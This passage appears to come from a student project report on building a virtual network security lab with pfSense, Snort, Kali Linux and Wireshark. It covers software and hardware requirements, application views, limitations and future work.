• Virtualization Platform: VMware/VirtualBox for setting up virtual environments
• Firewall: pfSense for traffic filtering and access control
• IDS: Snort for intrusion detection
• Penetration Testing Tools: Kali Linux for simulating attacks
• Programming Language: Python for custom scripting and automation
• Monitoring Tools: Wireshark for packet analysis

APPENDIX B:

Hardware Requirements
• Minimum System Configuration:
o Processor: Intel Core i5 or equivalent
o RAM: 8GB or higher
o Storage: 50GB free space
• Network Setup:
o Virtual network interfaces for simulating multiple devices and subnets
o A reliable internet connection for downloading tools and updates

Application
1. pfSense Dashboard
o Displays traffic logs, firewall rules, and network statistics.
2. Snort Alerts
o Shows intrusion detection alerts with timestamps and threat details.
3. Attack Simulation
o Visual depiction of a penetration test using Kali Linux tools.
4. Network Topology
o A graphical representation of the simulated network setup.

Challenges and Limitations

• False Positives: An IDS often generates false alarms, which require manual analysis.
• Resource Constraints: Running multiple virtual machines may strain lower-end hardware.
• Scalability: Simulating large-scale attacks or networks might need additional resources.
• Learning Curve: Complex tools like Snort and pfSense require training to use effectively.

Future Work Details

1. Advanced Threat Detection: Incorporating AI to detect zero-day attacks and improve intrusion
detection accuracy.
2. IoT Security: Expanding the system to include IoT device protection with custom rules.
3. Cloud Integration: Setting up cloud-based intrusion detection for hybrid environments.
4. User Training Modules: Adding interactive tutorials for users to understand network security
practices.
